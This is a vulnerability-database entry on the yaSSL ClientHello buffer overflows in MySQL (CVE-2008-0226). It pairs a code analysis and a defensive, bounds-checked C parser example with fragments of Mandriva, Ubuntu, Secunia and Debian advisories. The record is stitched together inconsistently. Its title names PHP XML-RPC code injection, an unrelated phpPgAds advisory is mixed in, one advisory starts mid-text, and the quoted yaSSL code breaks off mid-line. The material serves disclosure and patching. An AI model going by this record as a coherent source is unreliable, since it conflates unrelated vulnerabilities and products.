VARIoT IoT vulnerabilities database

VAR-200801-0204 | CVE-2008-0226 | Multiple PHP XML-RPC implementations vulnerable to code injection |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Multiple buffer overflows in yaSSL 1.7.5 and earlier, as used in MySQL and possibly other products, allow remote attackers to execute arbitrary code via (1) the ProcessOldClientHello function in handshake.cpp or (2) "input_buffer& operator>>" in yassl_imp.cpp. yaSSL is prone to multiple remote buffer-overflow vulnerabilities. Failed attacks will cause denial-of-service conditions.
yaSSL 1.7.5 is vulnerable to these issues; other versions are also likely to be affected.

# MySQL yaSSL SSL Hello Message Buffer Overflow

1. Vulnerability introduction and analysis

yaSSL is an open-source SSL implementation. Its handshake code contains multiple remote overflow and invalid memory access issues, and a remote attacker may be able to use them to take control of the server. The stack buffer overflow affects yaSSL 1.7.5 and earlier, including the copy bundled with MySQL <= 6.0.

Code analysis: the structure that receives the fields of a client's Hello message is declared as follows (from yassl_imp.hpp):

    class ClientHello : public HandShakeBase {
        ProtocolVersion   client_version_;
        Random            random_;
        uint8             id_len_;                       // session id length
        opaque            session_id_[ID_LEN];
        uint16            suite_len_;                    // cipher suite length
        opaque            cipher_suites_[MAX_SUITE_SZ];
        uint8             comp_len_;                     // compression length
        CompressionMethod compression_methods_;
        ...

Here ID_LEN is 32 bytes, MAX_SUITE_SZ is 64 and RAN_LEN (the size of the random field) is 32. When an old-format (SSLv2-compatible) Hello message is received, the ProcessOldClientHello function that handles it does not check the lengths announced in the message against the sizes of these three fixed-size fields before copying the data into them, so an attacker who announces a larger length overflows the stack-allocated ClientHello. The vulnerable code in handshake.cpp begins as follows:

    void ProcessOldClientHello(input_buffer& input, SSL& ssl)
    ...
        ClientHello ch;
    ...
        for (uint16 i = 0; i < ch.
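The missing check described above, shown as an added example that is neither yaSSL's code nor part of the original analysis: a parser for a simplified SSLv2-style CLIENT-HELLO that validates each announced length twice, against the bytes actually received and against the fixed-size destination field, before copying anything. The wire layout, the struct layout, and the helpers build_hello() and check_hello() are assumptions made for this example; only the sizes ID_LEN, MAX_SUITE_SZ and RAN_LEN are taken from the analysis above.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Fixed field sizes, as quoted in the analysis above for yaSSL. */
#define ID_LEN       32
#define MAX_SUITE_SZ 64
#define RAN_LEN      32
#define HDR_LEN      9   /* header length of the simplified hello below */

/* Destination with fixed-size fields (layout assumed for this example). */
typedef struct {
    uint16_t suite_len;  uint8_t cipher_suites[MAX_SUITE_SZ];
    uint8_t  id_len;     uint8_t session_id[ID_LEN];
    uint8_t  random_len; uint8_t random[RAN_LEN];
} OldClientHello;

/* Simplified SSLv2-style CLIENT-HELLO (constructed for the example, not
 * yaSSL's parser): [0] type=1, [1..2] version, [3..4] cipher-spec length,
 * [5..6] session-id length, [7..8] challenge length (all big endian),
 * followed by the cipher specs, the session id and the challenge. */
static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* 0 = accepted, -1 = rejected. Check 1 keeps the reads inside the received
 * record; check 2 keeps each copy inside its fixed-size field. Check 2 is
 * the one whose absence in ProcessOldClientHello overruns the stack. */
int parse_old_client_hello(const uint8_t *msg, size_t msg_len, OldClientHello *out)
{
    if (msg_len < HDR_LEN || msg[0] != 1)
        return -1;
    uint16_t suite_len = be16(msg + 3), id_len = be16(msg + 5), ran_len = be16(msg + 7);

    if ((size_t)suite_len + id_len + ran_len > msg_len - HDR_LEN)        /* check 1 */
        return -1;
    if (suite_len > MAX_SUITE_SZ || id_len > ID_LEN || ran_len > RAN_LEN) /* check 2 */
        return -1;
    if (suite_len % 3 != 0)              /* SSLv2 cipher specs are 3 bytes each */
        return -1;

    const uint8_t *p = msg + HDR_LEN;
    memset(out, 0, sizeof *out);
    out->suite_len = suite_len;
    memcpy(out->cipher_suites, p, suite_len);  p += suite_len;
    out->id_len = (uint8_t)id_len;
    memcpy(out->session_id, p, id_len);        p += id_len;
    out->random_len = (uint8_t)ran_len;
    memcpy(out->random, p, ran_len);
    return 0;
}

/* Builds a hello announcing the given lengths (constructed test input).
 * Returns bytes written, or 0 if buf is too small. */
size_t build_hello(uint8_t *buf, size_t cap, uint16_t suite_len, uint16_t id_len, uint16_t ran_len)
{
    size_t total = HDR_LEN + (size_t)suite_len + id_len + ran_len;
    if (total > cap)
        return 0;
    buf[0] = 1; buf[1] = 0x00; buf[2] = 0x02;
    buf[3] = (uint8_t)(suite_len >> 8); buf[4] = (uint8_t)suite_len;
    buf[5] = (uint8_t)(id_len >> 8);    buf[6] = (uint8_t)id_len;
    buf[7] = (uint8_t)(ran_len >> 8);   buf[8] = (uint8_t)ran_len;
    memset(buf + HDR_LEN, 0x41, total - HDR_LEN);   /* filler payload */
    return total;
}

/* Builds a hello with the given lengths, optionally keeps only the first
 * `keep` bytes (0 = whole record), and returns the parser's verdict. */
int check_hello(uint16_t suite_len, uint16_t id_len, uint16_t ran_len, size_t keep)
{
    uint8_t buf[4096];
    OldClientHello ch;
    size_t n = build_hello(buf, sizeof buf, suite_len, id_len, ran_len);
    if (n == 0)
        return -1;
    if (keep != 0 && keep < n)
        n = keep;
    return parse_old_client_hello(buf, n, &ch);
}

int main(void)
{
    printf("benign 3/16/16:           %s\n", check_hello(3, 16, 16, 0) == 0 ? "accepted" : "rejected");
    printf("session id 255 > ID_LEN:  %s\n", check_hello(3, 255, 16, 0) == 0 ? "accepted" : "rejected");
    printf("66 suite bytes > 64:      %s\n", check_hello(66, 16, 16, 0) == 0 ? "accepted" : "rejected");
    printf("record cut to 20 bytes:   %s\n", check_hello(3, 16, 16, 20) == 0 ? "accepted" : "rejected");
    return 0;
}
```

The two checks are independent. Check 1 alone only prevents reading past the end of the received record; a message that is fully present but announces a 255-byte session id still passes it and, without check 2, would be copied over the 32-byte session_id_ field and whatever follows it on the stack. A fix that adds only the first check therefore does not close the overflow.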
Sergei Golubchik found that MySQL did not properly validate optional
data or index directory paths given in a CREATE TABLE statement; as
well it would not, under certain conditions, prevent two databases
from using the same paths for data or index files. This could allow
an authenticated user with appropriate privilege to create tables in
one database to read and manipulate data in tables later created in
other databases, regardless of GRANT privileges (CVE-2008-2079).
The updated packages have been patched to correct these issues.
_______________________________________________________________________
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0226
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0227
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2079
_______________________________________________________________________
Updated Packages:
Mandriva Linux 2007.1:
56e59e5a7413ca900767afa20480fff5 2007.1/i586/libmysql15-5.0.45-8.2mdv2007.1.i586.rpm
c11348f9b60a3fb153cf07a7b2e22502 2007.1/i586/libmysql-devel-5.0.45-8.2mdv2007.1.i586.rpm
a60fca42161427ed528a6a1fd58c61e3 2007.1/i586/libmysql-static-devel-5.0.45-8.2mdv2007.1.i586.rpm
a6c4108497edb6cd0d7f723ca5f81c1f 2007.1/i586/mysql-5.0.45-8.2mdv2007.1.i586.rpm
62b091bfed614ed2be0e9f1dabc00e6e 2007.1/i586/mysql-bench-5.0.45-8.2mdv2007.1.i586.rpm
65c4cbcbaa11ad0fd5521ff9821a0e71 2007.1/i586/mysql-client-5.0.45-8.2mdv2007.1.i586.rpm
6cafb4fc0190c3d8c301737cc1b2d584 2007.1/i586/mysql-common-5.0.45-8.2mdv2007.1.i586.rpm
ab7ff6bc5ed1e3add97e87eadffdf7d0 2007.1/i586/mysql-max-5.0.45-8.2mdv2007.1.i586.rpm
0c0d3817061fed8a9495b976e9aad4f6 2007.1/i586/mysql-ndb-extra-5.0.45-8.2mdv2007.1.i586.rpm
e180f9184b397c76f121fa2cbcc249ee 2007.1/i586/mysql-ndb-management-5.0.45-8.2mdv2007.1.i586.rpm
11f6b6b340ec050489117a31ba1ada7b 2007.1/i586/mysql-ndb-storage-5.0.45-8.2mdv2007.1.i586.rpm
27d5c830d808a9198b5a3234ab635c31 2007.1/i586/mysql-ndb-tools-5.0.45-8.2mdv2007.1.i586.rpm
0b18a06428b4c5351ea19433a18ba44b 2007.1/SRPMS/mysql-5.0.45-8.2mdv2007.1.src.rpm
Mandriva Linux 2007.1/X86_64:
861ae8a12d105c0537345f4b1b6364a6 2007.1/x86_64/lib64mysql15-5.0.45-8.2mdv2007.1.x86_64.rpm
74995c774432f4acacf682d14b738bae 2007.1/x86_64/lib64mysql-devel-5.0.45-8.2mdv2007.1.x86_64.rpm
5453d884b0edf40606bd78e62aef8101 2007.1/x86_64/lib64mysql-static-devel-5.0.45-8.2mdv2007.1.x86_64.rpm
ef7ab96c6a492dad1a5f1463eaf5568b 2007.1/x86_64/mysql-5.0.45-8.2mdv2007.1.x86_64.rpm
e6527ea8482a7928095a2d1d24953ad6 2007.1/x86_64/mysql-bench-5.0.45-8.2mdv2007.1.x86_64.rpm
896ed2418af55577669d67b2b110fded 2007.1/x86_64/mysql-client-5.0.45-8.2mdv2007.1.x86_64.rpm
9cfc765f29d39220862dd8b38a7baddb 2007.1/x86_64/mysql-common-5.0.45-8.2mdv2007.1.x86_64.rpm
f738941dbf2fb982e5f91ad1f5b8dd99 2007.1/x86_64/mysql-max-5.0.45-8.2mdv2007.1.x86_64.rpm
604b3cda2222cc031819c1a76f64974e 2007.1/x86_64/mysql-ndb-extra-5.0.45-8.2mdv2007.1.x86_64.rpm
944f87e17f3a30a41392b57005b3866d 2007.1/x86_64/mysql-ndb-management-5.0.45-8.2mdv2007.1.x86_64.rpm
abe714a023e8019dc2379f38a10287c6 2007.1/x86_64/mysql-ndb-storage-5.0.45-8.2mdv2007.1.x86_64.rpm
60585f5c00ea687c710da9bf8dc620b0 2007.1/x86_64/mysql-ndb-tools-5.0.45-8.2mdv2007.1.x86_64.rpm
0b18a06428b4c5351ea19433a18ba44b 2007.1/SRPMS/mysql-5.0.45-8.2mdv2007.1.src.rpm
Mandriva Linux 2008.0:
32915a44b313f9752d53864929acacef 2008.0/i586/libmysql15-5.0.45-8.2mdv2008.0.i586.rpm
886f68f93c90d168f0f376f2bdf19dfe 2008.0/i586/libmysql-devel-5.0.45-8.2mdv2008.0.i586.rpm
05d52109e0e751d6ecb330361f0c49b1 2008.0/i586/libmysql-static-devel-5.0.45-8.2mdv2008.0.i586.rpm
c2d269602985c48dbfaa56edbb2089a5 2008.0/i586/mysql-5.0.45-8.2mdv2008.0.i586.rpm
fe5a49a0dbcf5b5b862fa15c697ec734 2008.0/i586/mysql-bench-5.0.45-8.2mdv2008.0.i586.rpm
5d9e574e07b13db1e98ac5084ef24c52 2008.0/i586/mysql-client-5.0.45-8.2mdv2008.0.i586.rpm
c3a73f6ba9467995e4eeeb2994987e8c 2008.0/i586/mysql-common-5.0.45-8.2mdv2008.0.i586.rpm
faca35a011bd9e95c3aded56c498efe7 2008.0/i586/mysql-max-5.0.45-8.2mdv2008.0.i586.rpm
ae5bece63ecfacd37582c68288e146a6 2008.0/i586/mysql-ndb-extra-5.0.45-8.2mdv2008.0.i586.rpm
6948d8799ff1e8e9ae3908dcfdfafc2a 2008.0/i586/mysql-ndb-management-5.0.45-8.2mdv2008.0.i586.rpm
11566a84793e2eb8b2e55fe28d89b918 2008.0/i586/mysql-ndb-storage-5.0.45-8.2mdv2008.0.i586.rpm
7e8e44013f0de7b0cd2c527da9202985 2008.0/i586/mysql-ndb-tools-5.0.45-8.2mdv2008.0.i586.rpm
af4075fd835e0372f1f6745f2f6f2d24 2008.0/SRPMS/mysql-5.0.45-8.2mdv2008.0.src.rpm
Mandriva Linux 2008.0/X86_64:
c3683e4b578bcf573913d2c8ea3bcc64 2008.0/x86_64/lib64mysql15-5.0.45-8.2mdv2008.0.x86_64.rpm
a15bc584715bfa86221d021a45610701 2008.0/x86_64/lib64mysql-devel-5.0.45-8.2mdv2008.0.x86_64.rpm
7037c5117e10169e7f0d862cb3916a7d 2008.0/x86_64/lib64mysql-static-devel-5.0.45-8.2mdv2008.0.x86_64.rpm
624b99283d71f7fc372029d188b0d68e 2008.0/x86_64/mysql-5.0.45-8.2mdv2008.0.x86_64.rpm
3efcb2ad37ae4d91f5915548fcebb0fc 2008.0/x86_64/mysql-bench-5.0.45-8.2mdv2008.0.x86_64.rpm
69b7b8e85e21c015d1db4822885f9e70 2008.0/x86_64/mysql-client-5.0.45-8.2mdv2008.0.x86_64.rpm
cd9cc2fd720dedef518fed7f6dbcd851 2008.0/x86_64/mysql-common-5.0.45-8.2mdv2008.0.x86_64.rpm
dc1da6c335fdbe30762c3bdc8431de71 2008.0/x86_64/mysql-max-5.0.45-8.2mdv2008.0.x86_64.rpm
065d9a2c3515567c0d11a45a44b2b902 2008.0/x86_64/mysql-ndb-extra-5.0.45-8.2mdv2008.0.x86_64.rpm
8fb80d3e1b683af128b77d1ab9e6ad06 2008.0/x86_64/mysql-ndb-management-5.0.45-8.2mdv2008.0.x86_64.rpm
9e4a50fcfb351876e1294bcc113a9d01 2008.0/x86_64/mysql-ndb-storage-5.0.45-8.2mdv2008.0.x86_64.rpm
0788ada6ccdddb7db76ebcf3efbe8e0b 2008.0/x86_64/mysql-ndb-tools-5.0.45-8.2mdv2008.0.x86_64.rpm
af4075fd835e0372f1f6745f2f6f2d24 2008.0/SRPMS/mysql-5.0.45-8.2mdv2008.0.src.rpm
Corporate 4.0:
08c68b948479e0609200d3a75fa1e6f8 corporate/4.0/i586/libmysql15-5.0.45-7.2.20060mlcs4.i586.rpm
9559df7a4dd7a7a5cd2f3350d0aaf644 corporate/4.0/i586/libmysql-devel-5.0.45-7.2.20060mlcs4.i586.rpm
7c6b41f3e966a9533fe2e508099e9ac3 corporate/4.0/i586/libmysql-static-devel-5.0.45-7.2.20060mlcs4.i586.rpm
83fc3360f5f3d5e4612e8b2dcccb9d86 corporate/4.0/i586/mysql-5.0.45-7.2.20060mlcs4.i586.rpm
119770dc70f1dec99770b89569d5f244 corporate/4.0/i586/mysql-bench-5.0.45-7.2.20060mlcs4.i586.rpm
eaba4a0339945fe1e6f3b2197d43dc6d corporate/4.0/i586/mysql-client-5.0.45-7.2.20060mlcs4.i586.rpm
9d19c37b04c4db67c135ecd277b48d55 corporate/4.0/i586/mysql-common-5.0.45-7.2.20060mlcs4.i586.rpm
29ce0477fee72dd9f76665b7ab3d3733 corporate/4.0/i586/mysql-max-5.0.45-7.2.20060mlcs4.i586.rpm
76ef2d6cedff1526cea6e5391e53bd0b corporate/4.0/i586/mysql-ndb-extra-5.0.45-7.2.20060mlcs4.i586.rpm
efd3de6baa6c09f0926e1d71fdcbb7d2 corporate/4.0/i586/mysql-ndb-management-5.0.45-7.2.20060mlcs4.i586.rpm
58acbcf9bd22ae8b686f270959a24d9a corporate/4.0/i586/mysql-ndb-storage-5.0.45-7.2.20060mlcs4.i586.rpm
0679c750bc5dd1f0ad9c26513c9d5a1f corporate/4.0/i586/mysql-ndb-tools-5.0.45-7.2.20060mlcs4.i586.rpm
a2744801fe9ed017d4cfb3b40d7dcc42 corporate/4.0/SRPMS/mysql-5.0.45-7.2.20060mlcs4.src.rpm
Corporate 4.0/X86_64:
1540c030207321b12c1dbf6518b259ea corporate/4.0/x86_64/lib64mysql15-5.0.45-7.2.20060mlcs4.x86_64.rpm
b8a1daf95d7212f43635d06e709c3318 corporate/4.0/x86_64/lib64mysql-devel-5.0.45-7.2.20060mlcs4.x86_64.rpm
11ff72e78bca0c13e2bbe1d3eba69b6f corporate/4.0/x86_64/lib64mysql-static-devel-5.0.45-7.2.20060mlcs4.x86_64.rpm
ec357bc74168b72e716ee47fdc8953ef corporate/4.0/x86_64/mysql-5.0.45-7.2.20060mlcs4.x86_64.rpm
2d4a49b5b2ef6be7f180c37bf6848502 corporate/4.0/x86_64/mysql-bench-5.0.45-7.2.20060mlcs4.x86_64.rpm
5acf56e4dc62af041eeeff90ad32ddbf corporate/4.0/x86_64/mysql-client-5.0.45-7.2.20060mlcs4.x86_64.rpm
eadd8f9b5afdadc1e67ab76e63c5ede6 corporate/4.0/x86_64/mysql-common-5.0.45-7.2.20060mlcs4.x86_64.rpm
233bd234e9c9ce5922b9655a6fdd72ce corporate/4.0/x86_64/mysql-max-5.0.45-7.2.20060mlcs4.x86_64.rpm
97494344056c6e4f8340eaf0036ac97f corporate/4.0/x86_64/mysql-ndb-extra-5.0.45-7.2.20060mlcs4.x86_64.rpm
ca70ce3ed5c592ec41151b1c6f1d43d8 corporate/4.0/x86_64/mysql-ndb-management-5.0.45-7.2.20060mlcs4.x86_64.rpm
379dab3d7aecfba0b93d5e5691d742db corporate/4.0/x86_64/mysql-ndb-storage-5.0.45-7.2.20060mlcs4.x86_64.rpm
e0e9ca0dc122c8657aada9a9db758ca1 corporate/4.0/x86_64/mysql-ndb-tools-5.0.45-7.2.20060mlcs4.x86_64.rpm
a2744801fe9ed017d4cfb3b40d7dcc42 corporate/4.0/SRPMS/mysql-5.0.45-7.2.20060mlcs4.src.rpm
_______________________________________________________________________
To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
_______________________________________________________________________
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
<security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
iD8DBQFIgkXmmqjQ0CJFipgRAkLWAKClwPBbIW2SXkcexkEJjW79kexPLQCfRirO
wV2/ikre4rdv7NLrZRgofos=
=qdV+
-----END PGP SIGNATURE-----
===========================================================
Ubuntu Security Notice USN-588-2 April 02, 2008
mysql-dfsg-5.0 regression
https://launchpad.net/bugs/209699
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
mysql-server-5.0 5.0.22-0ubuntu6.06.9
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
USN-588-1 fixed vulnerabilities in MySQL. In fixing CVE-2007-2692 for
Ubuntu 6.06, additional improvements were made to make privilege checks
more restrictive. As a result, an upstream bug was exposed which could
cause operations on tables or views in a different database to fail. This
update fixes the problem.
We apologize for the inconvenience.
Original advisory details:
Masaaki Hirose discovered that MySQL could be made to dereference
a NULL pointer. An authenticated user could cause a denial of service
(application crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA
table. This issue only affects Ubuntu 6.06 and 6.10. (CVE-2006-7232)
Alexander Nozdrin discovered that MySQL did not restore database access
privileges when returning from SQL SECURITY INVOKER stored routines. An
authenticated user could exploit this to gain privileges. This issue
does not affect Ubuntu 7.10. (CVE-2007-2692)
Martin Friebe discovered that MySQL did not properly update the DEFINER
value of an altered view. An authenticated user could use CREATE SQL
SECURITY DEFINER VIEW and ALTER VIEW statements to gain privileges.
(CVE-2007-6303)
Luigi Auriemma discovered that yaSSL as included in MySQL did not
properly validate its input. This issue did not affect Ubuntu 6.06 in the default installation.
(CVE-2008-0226, CVE-2008-0227)
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.9.diff.gz
Size/MD5: 155085 f8c7ef90adb69cf67cc6366612b63d48
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22-0ubuntu6.06.9.dsc
Size/MD5: 1114 d305551acc1c106afc8fcea708bf7748
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.22.orig.tar.gz
Size/MD5: 18446645 2b8f36364373461190126817ec872031
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client_5.0.22-0ubuntu6.06.9_all.deb
Size/MD5: 38560 ba617aed9cc0de2b3ab0bb27e4b73208
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-common_5.0.22-0ubuntu6.06.9_all.deb
Size/MD5: 41108 c5723e8875ec8ec61bc3e35d279b0785
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server_5.0.22-0ubuntu6.06.9_all.deb
Size/MD5: 38564 4c87c774aa76333f9b6ce71be03abd9e
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_amd64.deb
Size/MD5: 6727828 250a0dc849c954205639795ead8c913c
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_amd64.deb
Size/MD5: 1423476 81fa43f4bcdaa9721311dd9cd7977713
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_amd64.deb
Size/MD5: 6897250 ee100a247642429c58c20cf501da925d
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_amd64.deb
Size/MD5: 22493122 6c8dc59d6b0f8885bdc08e72f7aef6b6
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_i386.deb
Size/MD5: 6141858 992e52adad73209d80bab70f7fb22d46
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_i386.deb
Size/MD5: 1383980 fcbf70966d6875c053e30e153b610991
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_i386.deb
Size/MD5: 6279892 cb5107c59d51513dc3b7d89ef64c2de1
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_i386.deb
Size/MD5: 21351224 84fe07a8a90d1d7bdefcdfa8bf34bc55
powerpc architecture (Apple Macintosh G3/G4/G5):
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_powerpc.deb
Size/MD5: 6885504 86e9ad51262265b596bf490ce3c46a2d
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_powerpc.deb
Size/MD5: 1463828 6a87ebba2667b07ca253b7bc3772d91e
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_powerpc.deb
Size/MD5: 6943956 f8630ffc208f766da49a1628076830b6
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_powerpc.deb
Size/MD5: 22706410 6e44a8947af147ac14a15fdd66e80bfd
sparc architecture (Sun SPARC/UltraSPARC):
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.22-0ubuntu6.06.9_sparc.deb
Size/MD5: 6433916 dea5c30c9bc61cf362cfbb7cb692a280
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.22-0ubuntu6.06.9_sparc.deb
Size/MD5: 1435924 5da529e0936388dc5584deb4155ba390
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.22-0ubuntu6.06.9_sparc.deb
Size/MD5: 6538958 4e658a8fca75f30eeafbfff2a2bffa9c
http://security.ubuntu.com/ubuntu/pool/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.22-0ubuntu6.06.9_sparc.deb
Size/MD5: 21972902 4d273677401e7896b4e65d8fc9996ce5
----------------------------------------------------------------------
Are you interested in a new job in IT security?
Secunia has two open positions for a Junior and a Senior Specialist in
IT Security:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
phpPgAds XML-RPC PHP Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA15884
VERIFY ADVISORY:
http://secunia.com/advisories/15884/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
phpPgAds 2.x
http://secunia.com/product/4577/
DESCRIPTION:
A vulnerability has been reported in phpPgAds, which can be exploited
by malicious people to compromise a vulnerable system.
http://sourceforge.net/project/showfiles.php?group_id=36679
OTHER REFERENCES:
SA15852:
http://secunia.com/advisories/15852/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1478-1 security@debian.org
http://www.debian.org/security/ Moritz Muehlenhoff
January 28, 2008 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : mysql-dfsg-5.0
Vulnerability : buffer overflows
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2008-0226 CVE-2008-0227
Luigi Auriemma discovered two buffer overflows in YaSSL, an SSL
implementation included in the MySQL database package, which could lead
to denial of service and possibly the execution of arbitrary code.
For the unstable distribution (sid), these problems have been fixed in
version 5.0.51-3.
For the stable distribution (etch), these problems have been fixed in
version 5.0.32-7etch5.
The old stable distribution (sarge) doesn't contain mysql-dfsg-5.0.
We recommend that you upgrade your mysql-dfsg-5.0 package.
Upgrade instructions
- --------------------
wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.
If you are using the apt-get package manager, use the line for
sources.list as given below:
apt-get update
will update the internal database
apt-get upgrade
will install corrected packages
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian 4.0 (stable)
- -------------------
Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32.orig.tar.gz
Size/MD5 checksum: 16439441 f99df050b0b847adf7702b44e79ac877
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch5.diff.gz
Size/MD5 checksum: 165895 05351b7ac0547d3666828c7eba89ee18
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch5.dsc
Size/MD5 checksum: 1117 7d6a184cf5bda53d18be88728a0635c4
Architecture independent packages:
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.32-7etch5_all.deb
Size/MD5 checksum: 45636 c2d87b9755088b3a67851dc4867a67f8
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.32-7etch5_all.deb
Size/MD5 checksum: 47716 5c9311fc2072be8336424c648497303e
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.32-7etch5_all.deb
Size/MD5 checksum: 53944 3a16dd0a2c795cf7e906c648844a9779
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_alpha.deb
Size/MD5 checksum: 8912752 826f18c201582262ee622ed9e470a915
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_alpha.deb
Size/MD5 checksum: 1950712 47215338ef678adf7ca6f80d9d60613e
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_alpha.deb
Size/MD5 checksum: 8407802 e6e87a2edaf5f0405473fb3f5c859b3f
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_alpha.deb
Size/MD5 checksum: 27365718 f83e12f0f36c31b4dbd64ab7b1b6f01d
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_alpha.deb
Size/MD5 checksum: 47748 91489bb86084a9f6026c6156a4a5faa0
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch5_amd64.deb
Size/MD5 checksum: 7376450 ba1c75fa6963352a0af68c4db08d0c12
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch5_amd64.deb
Size/MD5 checksum: 47708 4a3047795b3030063a47c969cfe4c324
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch5_amd64.deb
Size/MD5 checksum: 1830910 c24fc179d4fb37994b5af2cb8c405ff1
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch5_amd64.deb
Size/MD5 checksum: 25939846 8b0e047de274ed90f69a76f22866561a
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch5_amd64.deb
Size/MD5 checksum: 7547346 003c7231b81203a50ec563ff5142a010
arm architecture (ARM)
